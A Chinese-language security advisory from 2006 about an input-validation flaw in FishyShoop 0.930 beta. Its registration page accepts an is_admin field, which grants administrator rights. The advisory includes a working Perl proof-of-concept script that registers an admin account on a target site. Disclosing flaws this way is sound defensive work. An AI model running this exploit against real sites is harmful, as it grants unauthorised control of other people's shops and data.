发布日期：2006-12-24
更新日期：2006-12-26

受影响系统：

FishyShoop FishyShoop 0.930 beta

描述：

---

BUGTRAQ  ID: 21731

Fishyshoop是一款网上购物软件。

Fishyshoop在处理用户请求时存在输入验证漏洞，远程攻击者可能利用此漏洞非授权获取服务的管理权限。

Fishyshoop的pages/register/register.php文件会获取每个POST变量并将变量值注入到同一名称字段下新的记录中。如果注册时pages/register/register.php文件的is_admim变量被设置为1的话，则登录帐号就会在站点获得管理权限。

<*来源：James Gray （james6.0@gmail.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=116707148304791&w=2
        http://secunia.com/advisories/23490/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/perl

use WWW::Curl::Easy;

sub usage() {
  print "$0 <Fishyshoop root URL> <Desired E-Mail> <Desired Password>\n";
  exit();
}

$FSURL=shift or usage(); $UNAME=shift or usage(); $PASS=shift or usage();

my $fishyshoop = new WWW::Curl::Easy;
$fishyshoop->setopt(CURLOPT_URL, "$FSURL?L=register.register");
$fishyshoop->setopt(CURLOPT_POST, 1);
$fishyshoop->setopt(CURLOPT_POSTFIELDS,
"email=$UNAME&password=$PASS&is_admin=1&submit=1");
$fishyshoop->perform;

建议：

---

厂商补丁：

FishyShoop
----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.fishyshoop.com/

浏览次数：2769
严重程度：0（网友投票）